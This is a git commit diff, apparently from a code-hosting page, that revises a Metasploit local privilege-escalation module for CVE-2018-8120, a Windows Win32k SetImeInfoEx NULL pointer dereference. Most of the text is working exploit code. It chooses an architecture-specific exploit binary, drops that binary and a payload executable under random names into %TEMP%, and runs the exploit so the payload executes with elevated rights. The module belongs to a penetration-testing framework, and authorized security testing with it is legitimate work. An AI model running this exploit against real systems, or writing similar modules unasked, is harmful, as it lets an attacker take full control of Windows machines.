addressed suggestions
This commit is contained in:
parent
96eeaf7da3
commit
26631bcfbd
Binary file not shown.
|
@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -61,45 +62,33 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if sysinfo['OS'] =~ /XP/
|
||||
if sysinfo['OS'] =~ /XP|NT/i
|
||||
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
|
||||
end
|
||||
end
|
||||
|
||||
def write_exe_to_target(rexe, rexename)
|
||||
def write_file_to_target(fname, data)
|
||||
begin
|
||||
vprint_warning("Writing file to %TEMP%")
|
||||
print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference")
|
||||
temprexe = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"
|
||||
write_file_to_target(temprexe,rexe)
|
||||
tempdir = session.sys.config.getenv('TEMP')
|
||||
file_loc = "#{tempdir}\\#{fname}"
|
||||
vprint_warning("Attempting to write #{fname} to #{tempdir}")
|
||||
write_file(file_loc, data)
|
||||
rescue
|
||||
fail_with(Failure::Unknown, "Writing #{rexename} to disk was unsuccessful")
|
||||
fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
|
||||
end
|
||||
|
||||
vprint_good("File path: #{temprexe}")
|
||||
temprexe
|
||||
end
|
||||
|
||||
def write_file_to_target(temprexe, rexe)
|
||||
fd = session.fs.file.new(temprexe, "wb")
|
||||
fd.write(rexe)
|
||||
fd.close
|
||||
end
|
||||
|
||||
def create_payload_from_file(exec)
|
||||
vprint_status("Reading payload from file #{exec}")
|
||||
File.read(exec)
|
||||
vprint_good("#{fname} written")
|
||||
file_loc
|
||||
end
|
||||
|
||||
def check_arch
|
||||
sys_arch = sysinfo['Architecture']
|
||||
if sys_arch == ARCH_X86
|
||||
fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
|
||||
return 'CVE-2018-8120x86.exe'
|
||||
|
||||
elsif sys_arch == ARCH_X64
|
||||
return 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86
|
||||
|
||||
'CVE-2018-8120x64.exe'
|
||||
return 'CVE-2018-8120x64.exe'
|
||||
else
|
||||
fail_with(Failure::BadConfig, "Invalid architecture")
|
||||
end
|
||||
|
@ -109,23 +98,25 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
validate_target
|
||||
cve_fname = check_arch
|
||||
rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)
|
||||
raw = create_payload_from_file(rexe)
|
||||
vprint_status("Reading payload from file #{rexe}")
|
||||
raw = File.read(rexe)
|
||||
|
||||
rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
|
||||
vprint_status("EXE's name is: #{rexename}")
|
||||
exe = generate_payload_exe
|
||||
tempdir = session.sys.config.getenv('TEMP')
|
||||
tempexename = Rex::Text.rand_text_alpha(6..14)
|
||||
tempexename = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
|
||||
|
||||
cmd = "#{tempdir}\\#{tempexename}.exe"
|
||||
vprint_status("Preparing payload at #{cmd}")
|
||||
write_file(cmd, exe)
|
||||
exe_payload = write_file_to_target(tempexename, exe)
|
||||
vprint_status("Payload uploaded to temp folder")
|
||||
script_on_target = write_exe_to_target(raw, rexename)
|
||||
command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"
|
||||
vprint_status("Location of CVE-2018-8120.exe is: #{command}")
|
||||
cve_exe = write_file_to_target(rexename, raw)
|
||||
command = "\"#{cve_exe}\" \"#{exe_payload}\""
|
||||
vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}")
|
||||
begin
|
||||
register_file_for_cleanup(exe_payload)
|
||||
rescue AccessDeniedError
|
||||
print_error("Failed to delete file at #{cve_exe}")
|
||||
end
|
||||
|
||||
command << " #{cmd}"
|
||||
vprint_status("Executing command : #{command}")
|
||||
cmd_exec_get_pid(command)
|
||||
print_good('Exploit finished, wait for privileged payload execution to complete.')
|
||||
|
|
Loading…
Reference in New Issue